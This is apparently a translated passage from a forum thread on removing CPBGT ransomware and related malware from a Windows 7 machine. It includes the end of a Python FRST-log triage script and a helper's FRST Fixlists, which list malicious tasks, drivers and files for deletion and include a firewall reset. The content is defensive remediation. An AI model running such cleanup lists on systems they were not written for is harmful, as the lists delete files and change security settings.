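def triage(log_text):
    """One finding per (line, rule) hit, in log order; FRST's own marker is kept as corroboration."""
    findings = []
    for lineno, raw in enumerate(log_text.splitlines(), 1):
        line = raw.strip()
        if not line:
            continue
        for name, matcher, why in RULES:
            if matcher(line):
                findings.append({"line": lineno, "rule": name, "why": why,
                                 "frst_flagged": "<==== UWAGA" in line, "text": line})
    return findings


def summarize(findings):
    """Rule -> hit count, handy for deciding which cleanup steps a Fixlist needs."""
    return dict(Counter(f["rule"] for f in findings))


if __name__ == "__main__":
    hits = triage(SAMPLE_LOG)
    for f in hits:
        flag = " (also flagged by FRST)" if f["frst_flagged"] else ""
        print(f"line {f['line']:>2} {f['rule']:<32} {f['why']}{flag}")
    print(summarize(hits))
```

    The last sample line (a signed Microsoft binary under Program Files) is the control case and produces no finding.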
  • #6
    Kolobos
    IT specialist
    With a file-encrypting infection that is normal; you can pretty much forget about the files.

    I see that Lista BCD did not work; post a screenshot of msconfig, the Boot tab.

    Uninstall CloudNet

    Run a new Fixlist.txt for FRST:
    CloseProcesses:
    Task: {3A76426B-A623-40CA-81A9-41E8CDF5CB93} - \csrss -> Brak pliku <==== UWAGA
    Task: {3EB9CFFA-35F0-49A0-9081-6DF8931151D1} - \Opera scheduled Autoupdate 2796787680 -> Brak pliku <==== UWAGA
    Task: {C5B2A3AD-9E12-4910-9413-51DAD4BA2027} - \ScheduledUpdate -> Brak pliku <==== UWAGA
    Task: {DFAA6C60-863C-4CD4-B368-2C762424A16C} - \Opera scheduled Autoupdate 1533523119 -> Brak pliku <==== UWAGA
    Task: {E018B339-11B8-4027-B424-99290EF4394A} - System32\Tasks\Microsoft LocalManager[Windows 7 Professional] => C:\ProgramData\{88137684-8813-8813-881376846686}\lsm.exe [2019-01-26] (MASTER.CURRENT.PANAMA.denmark.death.month]) <==== UWAGA
    2019-01-26 17:28 - 2019-01-26 17:28 - 001435136 ____H () C:\Windows\windefender.exe
    CMD: netsh advfirewall reset
    () C:\Windows\windefender.exe
    (EpicNet Inc.) C:\Users\cwk\AppData\Roaming\EpicNet Inc\CloudNet\cloudnet.exe
    (MASTER.CURRENT.PANAMA.denmark.death.month]) C:\ProgramData\{88137684-8813-8813-881376846686}\lsm.exe
    (MASTER.CURRENT.PANAMA.denmark.death.month]) C:\ProgramData\{88137684-8813-8813-881376846686}\lsm.exe
    HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Ograniczenia <==== UWAGA
    HKU\S-1-5-21-469818906-28220939-695786958-1000\...\Run: [CloudNet] => C:\Users\cwk\AppData\Roaming\EpicNet Inc\CloudNet\cloudnet.exe [683008 2019-01-26] (EpicNet Inc.) <==== UWAGA
    R2 WinDefender; C:\Windows\windefender.exe [1435136 2019-01-26] ()
    2019-01-26 19:14 - 2019-01-31 16:22 - 000000000 ____D C:\Users\cwk\Desktop\FRST-OlderVersion
    2019-01-26 19:14 - 2019-01-26 19:14 - 000008946 _____ C:\Program Files\CPBGT-DECRYPT.txt
    2019-01-26 19:14 - 2019-01-26 19:14 - 000008946 _____ C:\Program Files (x86)\CPBGT-DECRYPT.txt
    2019-01-26 19:14 - 2019-01-26 19:14 - 000003494 _____ C:\Windows\System32\Tasks\Microsoft LocalManager[Windows 7 Professional]
    2019-01-26 19:14 - 2019-01-26 19:14 - 000000000 __SHD C:\ProgramData\{88137684-8813-8813-881376846686}
    2019-01-26 19:13 - 2019-01-26 19:13 - 001246160 _____ (Mozilla Foundation) C:\ProgramData\nss3.dll
    2019-01-26 19:13 - 2019-01-26 19:13 - 000440120 _____ (Microsoft Corporation) C:\ProgramData\msvcp140.dll
    2019-01-26 19:13 - 2019-01-26 19:13 - 000137168 _____ (Mozilla Foundation) C:\ProgramData\mozglue.dll
    2019-01-26 19:13 - 2019-01-26 19:13 - 000008946 _____ C:\Users\cwk\CPBGT-DECRYPT.txt
    2019-01-26 19:13 - 2019-01-26 19:13 - 000008946 _____ C:\Users\cwk\AppData\Local\CPBGT-DECRYPT.txt
    2019-01-26 19:13 - 2019-01-26 19:13 - 000008946 _____ C:\Users\cwk\AppData\CPBGT-DECRYPT.txt
    2019-01-26 19:13 - 2019-01-26 19:13 - 000008946 _____ C:\Users\CPBGT-DECRYPT.txt
    2019-01-26 19:13 - 2019-01-26 19:13 - 000008946 _____ C:\CPBGT-DECRYPT.txt
    2019-01-26 19:13 - 2019-01-26 19:13 - 000003226 _____ C:\Windows\System32\Tasks\Windows Defender
    2019-01-26 19:13 - 2019-01-26 19:13 - 000000000 ___HD C:\Users\cwk\AppData\Roaming\klogs
    2019-01-26 19:13 - 2019-01-26 19:13 - 000000000 ____D C:\ProgramData\PBURR8NUOYCLZ7H2N4MA
    2019-01-26 17:28 - 2019-01-26 17:28 - 001435136 ____H C:\Windows\windefender.exe
    2019-01-26 17:16 - 2019-01-26 17:16 - 000000000 ____D C:\Users\cwk\AppData\Roaming\EpicNet Inc
    2019-01-25 19:41 - 2019-01-25 19:41 - 000023272 _____ (Windows (R) Win 7 DDK provider) C:\Windows\system32\Drivers\WinmonFS.sys
    2019-01-25 19:41 - 2019-01-25 19:41 - 000009352 _____ C:\Windows\system32\Drivers\Winmon.sys
    2019-01-25 19:40 - 2019-01-26 19:13 - 006161948 _____ C:\Users\cwk\AppData\Local\dump007.dat.cpbgt
    2019-01-25 19:40 - 2019-01-25 19:41 - 005552360 _____ (Microsoft Corporation) C:\Windows\system32\ntkrnlmp.exe
    2019-01-25 19:40 - 2019-01-25 19:41 - 000634272 _____ (Microsoft Corporation) C:\Windows\system32\osloader.exe
    2019-01-25 19:37 - 2019-01-31 16:20 - 000000000 ___HD C:\Windows\rss
    2019-01-25 19:37 - 2019-01-26 19:14 - 000006108 _____ C:\Users\cwk\AppData\Local\md.xml.cpbgt
    2019-01-25 19:37 - 2019-01-26 19:13 - 007859228 _____ C:\Users\cwk\AppData\Local\agent.dat.cpbgt
    2019-01-25 19:37 - 2019-01-26 19:13 - 001895923 _____ C:\Users\cwk\AppData\Local\DingTamtone.bin.cpbgt
    2019-01-25 19:37 - 2019-01-26 19:13 - 000071436 _____ C:\Users\cwk\AppData\Local\Config.xml.cpbgt
    2019-01-25 19:36 - 2019-01-26 19:14 - 000141340 _____ C:\Users\cwk\AppData\Local\installer.dat.cpbgt
    2019-01-23 17:23 - 2019-01-26 19:13 - 000000000 ____D C:\Users\cwk\AppData\Local\CrashRpt
    2019-01-02 18:51 - 2018-12-27 20:58 - 000000301 _____ C:\Users\cwk\d4ac4633ebd6440fa397b84f1bc94a3c.7z
    2019-01-26 19:13 - 2019-01-26 19:13 - 000137168 _____ (Mozilla Foundation) C:\ProgramData\mozglue.dll
    2019-01-26 19:13 - 2019-01-26 19:13 - 000440120 _____ (Microsoft Corporation) C:\ProgramData\msvcp140.dll
    2019-01-26 19:13 - 2019-01-26 19:13 - 001246160 _____ (Mozilla Foundation) C:\ProgramData\nss3.dll
    2019-01-26 19:14 - 2019-01-26 19:14 - 000008946 _____ () C:\Program Files\CPBGT-DECRYPT.txt
    2019-01-26 19:14 - 2019-01-26 19:14 - 000008946 _____ () C:\Program Files (x86)\CPBGT-DECRYPT.txt
    2019-01-25 19:37 - 2019-01-26 19:13 - 007859228 _____ () C:\Users\cwk\AppData\Local\agent.dat.cpbgt
    2019-01-25 19:37 - 2019-01-26 19:13 - 000071436 _____ () C:\Users\cwk\AppData\Local\Config.xml.cpbgt
    2019-01-26 19:13 - 2019-01-26 19:13 - 000008946 _____ () C:\Users\cwk\AppData\Local\CPBGT-DECRYPT.txt
    2019-01-25 19:37 - 2019-01-26 19:13 - 001895923 _____ () C:\Users\cwk\AppData\Local\DingTamtone.bin.cpbgt
    2019-01-25 19:40 - 2019-01-26 19:13 - 006161948 _____ () C:\Users\cwk\AppData\Local\dump007.dat.cpbgt
    2019-01-25 19:36 - 2019-01-26 19:14 - 000141340 _____ () C:\Users\cwk\AppData\Local\installer.dat.cpbgt
    2019-01-25 19:37 - 2019-01-26 19:14 - 000006108 _____ () C:\Users\cwk\AppData\Local\md.xml.cpbgt
    C:\Users\cwk\AppData\Roaming\EpicNet Inc\CloudNet\cloudnet.exe
    EmptyTemp:


    After that, use AdwCleaner, Scan option and then Clean option: http://www.bleepingcomputer.com/download/adwcleaner/

    Do a full scan with Mbam and remove whatever it detects:
    http://www.bleepingcomputer.com/download/malwarebytes-anti-malware/
    and http://ftp.drweb.com/pub/drweb/cureit/launch.exe

    Post new FRST logs from the scan.
  • #7
    cfirek
    Level 9  
    For now the first two points, i.e. the screenshot, and right away a problem with uninstalling the program. Any suggestions on how to do it?
  • #8
    Kolobos
    IT specialist
    You can skip it or remove it manually with regedit: search for CloudNet and delete its key from the Uninstall branch.

    In msconfig set Windows 7 as the default and remove Windows Fast Mode.
  • #10
    Kolobos
    IT specialist
    Another Fixlist.txt:
    Task: {08B11FFC-5803-4E3F-885D-753D63CE185C} - \ScheduledUpdate -> Brak pliku <==== UWAGA
    Task: {1319D7A6-2613-4562-8966-016A871E6668} - \Windows Defender -> Brak pliku <==== UWAGA
    HKLM-x32\...\Winlogon: [Userinit]
    HKLM-x32\...\Winlogon: [Shell] [ ] () <=== UWAGA
    HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Ograniczenia <==== UWAGA
    2019-01-31 21:05 - 2019-01-31 21:06 - 000000000 ____D C:\AdwCleaner

    After running it, delete the C:\FRST folder and that's all.